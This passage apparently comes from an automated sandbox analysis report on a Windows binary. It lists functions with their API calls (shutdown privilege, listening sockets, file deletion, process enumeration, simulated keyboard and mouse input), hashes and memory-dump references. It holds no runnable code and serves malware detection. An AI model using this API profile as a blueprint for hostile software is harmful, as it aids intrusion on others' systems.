                                                        • Part of subcall function 00F816C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F8170D
                                                        • Part of subcall function 00F816C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F8173A
                                                        • Part of subcall function 00F816C3: GetLastError.KERNEL32 ref: 00F8174A
                                                      • ExitWindowsEx.USER32(?,00000000), ref: 00F8E932
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                      • String ID: $ $@$SeShutdownPrivilege
                                                      • API String ID: 2234035333-3163812486
                                                      • Opcode ID: 3df3506afc2455365faa774766a0a407ad25da8c72ae8746986bdf59081b15d3
                                                      • Instruction ID: 8190633d80e8d0dddc426b331f8201735451c22697fd686ddbecb51a8fec01fb
                                                      • Opcode Fuzzy Hash: 3df3506afc2455365faa774766a0a407ad25da8c72ae8746986bdf59081b15d3
                                                      • Instruction Fuzzy Hash: E501D673A10215ABEB6436B49C86FFF725CAB14760F154521F813E21E2D6E49C40B7E0
                                                      Function 00FA1204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00FA1276
                                                      • WSAGetLastError.WSOCK32 ref: 00FA1283
                                                      • bind.WSOCK32(00000000,?,00000010), ref: 00FA12BA
                                                      • WSAGetLastError.WSOCK32 ref: 00FA12C5
                                                      • closesocket.WSOCK32(00000000), ref: 00FA12F4
                                                      • listen.WSOCK32(00000000,00000005), ref: 00FA1303
                                                      • WSAGetLastError.WSOCK32 ref: 00FA130D
                                                      • closesocket.WSOCK32(00000000), ref: 00FA133C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$closesocket$bindlistensocket
                                                      • String ID:
                                                      • API String ID: 540024437-0
                                                      • Opcode ID: eff2b741c1acbac1118fe8b523fc45e17702f8f192e4bc44930af6a3b6048f0d
                                                      • Instruction ID: 49bb44363143d1217ba9f1d4267bd504b6e721ab007776e141481d7606cfbadb
                                                      • Opcode Fuzzy Hash: eff2b741c1acbac1118fe8b523fc45e17702f8f192e4bc44930af6a3b6048f0d
                                                      • Instruction Fuzzy Hash: 8241B371A002149FD710EF24D4C9B2ABBE5BF46328F198188E8569F2D6C775EC81DBE1
                                                      Function 00F5B952 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • _free.LIBCMT ref: 00F5B9D4
                                                      • _free.LIBCMT ref: 00F5B9F8
                                                      • _free.LIBCMT ref: 00F5BB7F
                                                      • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00FC3700), ref: 00F5BB91
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00FF121C,000000FF,00000000,0000003F,00000000,?,?), ref: 00F5BC09
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00FF1270,000000FF,?,0000003F,00000000,?), ref: 00F5BC36
                                                      • _free.LIBCMT ref: 00F5BD4B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                      • String ID:
                                                      • API String ID: 314583886-0
                                                      • Opcode ID: d8074f83d3549eaa64f34e48f98252e806ea5aaa03daaf43cb1e25ac4a7ef5c3
                                                      • Instruction ID: 4b75191a798d622d6086f4a3c61c4741c873af12cb6f2401779b992ce8bbcb5f
                                                      • Opcode Fuzzy Hash: d8074f83d3549eaa64f34e48f98252e806ea5aaa03daaf43cb1e25ac4a7ef5c3
                                                      • Instruction Fuzzy Hash: 14C12871D04209AFDB20DF698C45BBA7BB8EF42322F14419AEE90D7251E7349E49F750
                                                      Function 00F8D3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F23AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F23A97,?,?,00F22E7F,?,?,?,00000000), ref: 00F23AC2
                                                        • Part of subcall function 00F8E199: GetFileAttributesW.KERNEL32(?,00F8CF95), ref: 00F8E19A
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00F8D420
                                                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 00F8D470
                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00F8D481
                                                      • FindClose.KERNEL32(00000000), ref: 00F8D498
                                                      • FindClose.KERNEL32(00000000), ref: 00F8D4A1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                      • String ID: \*.*
                                                      • API String ID: 2649000838-1173974218
                                                      • Opcode ID: e010d355a88b3c3bf07c726b43097bdf762573541127f97acd48079bfb660d1b
                                                      • Instruction ID: cb0b6accfb3799b1fcde47824b6e00202532372cfb71066a621af438742c6838
                                                      • Opcode Fuzzy Hash: e010d355a88b3c3bf07c726b43097bdf762573541127f97acd48079bfb660d1b
                                                      • Instruction Fuzzy Hash: 44317E714083559BC304FF64DC968EFB7A8BE91314F844A2DF4D193191EB34AA09EBA3
                                                      Function 00F5E4FF Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: __floor_pentium4
                                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                      • API String ID: 4168288129-2761157908
                                                      • Opcode ID: 2d3e79a5e559855455012afa06a428d4fd30ea96d9d4bffac1d3423bd47daf15
                                                      • Instruction ID: 3f11049aa5774efd851a16d9eaa418128b5e3293ddcf664801ef012c757a354c
                                                      • Opcode Fuzzy Hash: 2d3e79a5e559855455012afa06a428d4fd30ea96d9d4bffac1d3423bd47daf15
                                                      • Instruction Fuzzy Hash: 14C28072E046288FDB29CF28DD407E9B7B5EB44316F1441EAD94DE7240E778AE899F40
                                                      Function 00F9648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _wcslen.LIBCMT ref: 00F964DC
                                                      • CoInitialize.OLE32(00000000), ref: 00F96639
                                                      • CoCreateInstance.OLE32(00FBFCF8,00000000,00000001,00FBFB68,?), ref: 00F96650
                                                      • CoUninitialize.OLE32 ref: 00F968D4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                      • String ID: .lnk
                                                      • API String ID: 886957087-24824748
                                                      • Opcode ID: c2a0f805de600e098c773bbed3d8eda5043f78f712d08ca49e5df1e4f4bbb2e8
                                                      • Instruction ID: 48609cd18c5e25000d4d62e1d8b3c8bee6a69a5536ecbde1f074a764a879c82d
                                                      • Opcode Fuzzy Hash: c2a0f805de600e098c773bbed3d8eda5043f78f712d08ca49e5df1e4f4bbb2e8
                                                      • Instruction Fuzzy Hash: EFD14671508211AFD704EF24D891A6BB7E8FF98304F04496DF595CB2A1EB70ED09DBA2
                                                      Function 00FA22DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetForegroundWindow.USER32(?,?,00000000), ref: 00FA22E8
                                                        • Part of subcall function 00F9E4EC: GetWindowRect.USER32(?,?), ref: 00F9E504
                                                      • GetDesktopWindow.USER32 ref: 00FA2312
                                                      • GetWindowRect.USER32(00000000), ref: 00FA2319
                                                      • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00FA2355
                                                      • GetCursorPos.USER32(?), ref: 00FA2381
                                                      • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00FA23DF
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                      • String ID:
                                                      • API String ID: 2387181109-0
                                                      • Opcode ID: 56e51a49baa076f9441df4fffde18538b4f16c3c658b509a86d170571c27dc7c
                                                      • Instruction ID: 64d2f7afbdd1de37d3a2e3e4729a51f924f06913ecae77513880726e8744dcb0
                                                      • Opcode Fuzzy Hash: 56e51a49baa076f9441df4fffde18538b4f16c3c658b509a86d170571c27dc7c
                                                      • Instruction Fuzzy Hash: C031AF72604319AFDB20DF58CC45B9BB7A9FF86314F000A19F98597191DB74E908DBD2
                                                      Function 00F99B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F29CB3: _wcslen.LIBCMT ref: 00F29CBD
                                                      • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00F99B78
                                                      • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00F99C8B
                                                        • Part of subcall function 00F93874: GetInputState.USER32 ref: 00F938CB
                                                        • Part of subcall function 00F93874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F93966
                                                      • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00F99BA8
                                                      • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00F99C75
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                      • String ID: *.*
                                                      • API String ID: 1972594611-438819550
                                                      • Opcode ID: 0215a7a5f94cc8a099bab6d5e60cb1a668e95793b48603f70e75b5ed1acd6933
                                                      • Instruction ID: 43c703567d7c65b144c4acd1e7f418f39da9fcb567e5e9772978fc0ad3afd009
                                                      • Opcode Fuzzy Hash: 0215a7a5f94cc8a099bab6d5e60cb1a668e95793b48603f70e75b5ed1acd6933
                                                      • Instruction Fuzzy Hash: 5E419E71D0820A9FDF14DF68CC85AEEBBB8EF05310F24415AE805A2191EB749F44EFA0
                                                      Function 00F3997D Relevance: 7.9, APIs: 5, Instructions: 375COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F39BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00F39BB2
                                                      • DefDlgProcW.USER32(?,?,?,?,?), ref: 00F39A4E
                                                      • GetSysColor.USER32(0000000F), ref: 00F39B23
                                                      • SetBkColor.GDI32(?,00000000), ref: 00F39B36
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Color$LongProcWindow
                                                      • String ID:
                                                      • API String ID: 3131106179-0
                                                      • Opcode ID: f5f0cd0c9dab46e8b321fc957fa11450c3c11f51a0fd9eb78fd416d6bce081de
                                                      • Instruction ID: 2ef734a22eed5c486a1aada3826185b77dde6a05ae1666abe65bd4792c25a9b6
                                                      • Opcode Fuzzy Hash: f5f0cd0c9dab46e8b321fc957fa11450c3c11f51a0fd9eb78fd416d6bce081de
                                                      • Instruction Fuzzy Hash: 43A12D7251C504EEEB28AA3D8C59F7B355DEB82370F14430AF502C6695CAED9D01F672
                                                      Function 00FA1806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00FA304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00FA307A
                                                        • Part of subcall function 00FA304E: _wcslen.LIBCMT ref: 00FA309B
                                                      • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00FA185D
                                                      • WSAGetLastError.WSOCK32 ref: 00FA1884
                                                      • bind.WSOCK32(00000000,?,00000010), ref: 00FA18DB
                                                      • WSAGetLastError.WSOCK32 ref: 00FA18E6
                                                      • closesocket.WSOCK32(00000000), ref: 00FA1915
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                      • String ID:
                                                      • API String ID: 1601658205-0
                                                      • Opcode ID: 41586b20cff3603bafd14fca7a3d3d37f8bd2469a789b9bcbb7a76b87c88be8e
                                                      • Instruction ID: af677b4c19437f6eaffb3652854be12cbfa6b209ffc700e37293153c9a548549
                                                      • Opcode Fuzzy Hash: 41586b20cff3603bafd14fca7a3d3d37f8bd2469a789b9bcbb7a76b87c88be8e
                                                      • Instruction Fuzzy Hash: 5851A171A002109FDB10EF24D896F2A77E5AB49718F188158F9059F2C3CA79AD41DBE1
                                                      Function 00FB1C41 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                      • String ID:
                                                      • API String ID: 292994002-0
                                                      • Opcode ID: 167d258ffff3e7536dd037b34f638a122c89c79a965bffc82fa75ad851d10930
                                                      • Instruction ID: 136d117d9a8a2e03be261fad476be2f19fa4e7bc3bb3ad2ed635408b85e65c9f
                                                      • Opcode Fuzzy Hash: 167d258ffff3e7536dd037b34f638a122c89c79a965bffc82fa75ad851d10930
                                                      • Instruction Fuzzy Hash: F921A271B402155FD7208F1BC8A4BEA7BA5BF89324B588058E8498B251CB75DC42EFD0
                                                      Function 00F28060 Relevance: 7.4, Strings: 5, Instructions: 1151COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                      • API String ID: 0-1546025612
                                                      • Opcode ID: 09a290d6986466eeebee4d56017d6a348a0903b6dbd7de9a94a089a38cc5a726
                                                      • Instruction ID: 02aaeafb5e181e8911bf8f96d4bd9eb9961e0e09440ac406ca62c799568d4175
                                                      • Opcode Fuzzy Hash: 09a290d6986466eeebee4d56017d6a348a0903b6dbd7de9a94a089a38cc5a726
                                                      • Instruction Fuzzy Hash: 01A2B271E0122ACBDF24CF58D8417ADB7B1BF54760F2481AAE815A7385DB349D82EF90
                                                      Function 00FAA67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 00FAA6AC
                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 00FAA6BA
                                                        • Part of subcall function 00F29CB3: _wcslen.LIBCMT ref: 00F29CBD
                                                      • Process32NextW.KERNEL32(00000000,?), ref: 00FAA79C
                                                      • CloseHandle.KERNEL32(00000000), ref: 00FAA7AB
                                                        • Part of subcall function 00F3CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00F63303,?), ref: 00F3CE8A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                      • String ID:
                                                      • API String ID: 1991900642-0
                                                      • Opcode ID: ea8633b89171c345566782b9e349aed6cc07c57196545047d2a20ff58fc7dad2
                                                      • Instruction ID: 3341a4913819cfdca9c3fe6f8d6739e8ffa965c959fd623e78c2cfc5f6c1fe37
                                                      • Opcode Fuzzy Hash: ea8633b89171c345566782b9e349aed6cc07c57196545047d2a20ff58fc7dad2
                                                      • Instruction Fuzzy Hash: DC516CB1908310AFD310EF24DC86A6BBBE8FF89754F40492DF58597292EB34D904DB92
                                                      Function 00F8AA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00F8AAAC
                                                      • SetKeyboardState.USER32(00000080), ref: 00F8AAC8
                                                      • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00F8AB36
                                                      • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00F8AB88
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: KeyboardState$InputMessagePostSend
                                                      • String ID:
                                                      • API String ID: 432972143-0
                                                      • Opcode ID: cab36e8fe37b7827f3559fef8349db7ffa21147b12e709e4012fb77966c961f0
                                                      • Instruction ID: 20784453e38f90d9e85da834e71c94a5eadbc6967482fff986be84e163788f8e
                                                      • Opcode Fuzzy Hash: cab36e8fe37b7827f3559fef8349db7ffa21147b12e709e4012fb77966c961f0
                                                      • Instruction Fuzzy Hash: B3312830E40608AEFF35EB64CC45BFA7BA6EB84320F08421BF085561D1D3798981E7A2
                                                      Function 00F9CE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • InternetReadFile.WININET(?,?,00000400,?), ref: 00F9CE89
                                                      • GetLastError.KERNEL32(?,00000000), ref: 00F9CEEA
                                                      • SetEvent.KERNEL32(?,?,00000000), ref: 00F9CEFE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: ErrorEventFileInternetLastRead
                                                      • String ID:
                                                      • API String ID: 234945975-0
                                                      • Opcode ID: 721dcc05885f192445d21f6d9843ac81c62bdf3acd3a0f9ec41efc11b388648d
                                                      • Instruction ID: a930dfd03237ffcdf8666e6adfa1e2f30ae554a3dc560ade8fc988f0fc55cddd
                                                      • Opcode Fuzzy Hash: 721dcc05885f192445d21f6d9843ac81c62bdf3acd3a0f9ec41efc11b388648d
                                                      • Instruction Fuzzy Hash: 44219D719007059BEB20DF65C988BA77BF8EB50368F10442EE546D2151E774EE04AFA0
                                                      Function 00F88298 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 568stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00F882AA
                                                      Strings
